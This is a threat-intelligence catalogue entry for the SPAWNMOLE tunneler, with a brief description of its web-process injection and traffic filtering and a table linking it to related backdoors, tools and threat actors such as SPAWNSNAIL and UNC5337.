Hide Navigation Hide TOC

SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)

SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.

Cluster A	Galaxy A	Cluster B	Galaxy B	Level
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)	Tool	SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)	Backdoor	1
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)	Tool	UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)	Threat Actor	1
SPAWNMOLE (6c89c51f-1b97-4966-abc1-9cf526bb2892)	Tool	SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)	Tool	1
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)	Backdoor	SPAWNSLOTH (2c237974-edc2-460a-90b5-20f699560da3)	Tool	2
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)	Backdoor	UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)	Threat Actor	2
SPAWNSNAIL (de390f3e-c0d1-4c70-b121-a7a98f7326aa)	Backdoor	SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)	Tool	2
UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)	Threat Actor	SPAWNANT (e6cf28a6-94a9-4aab-b919-ad2f6a7e3b87)	Tool	2
SPAWNSLOTH (2c237974-edc2-460a-90b5-20f699560da3)	Tool	UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)	Threat Actor	2
UNC5337 (6fcf8d1f-2e68-4982-a579-2ca5595e4990)	Threat Actor	UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)	Threat Actor	2
BRICKSTORM (64a0e3ab-e201-4fdc-9836-85365dfa84bb)	Backdoor	UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)	Threat Actor	3
UTA0178 (f288f686-b5b3-4c86-9960-5f8fb18709a3)	Threat Actor	ROOTROT (69d0512d-c12a-4e17-a335-deba012a8499)	Tool	3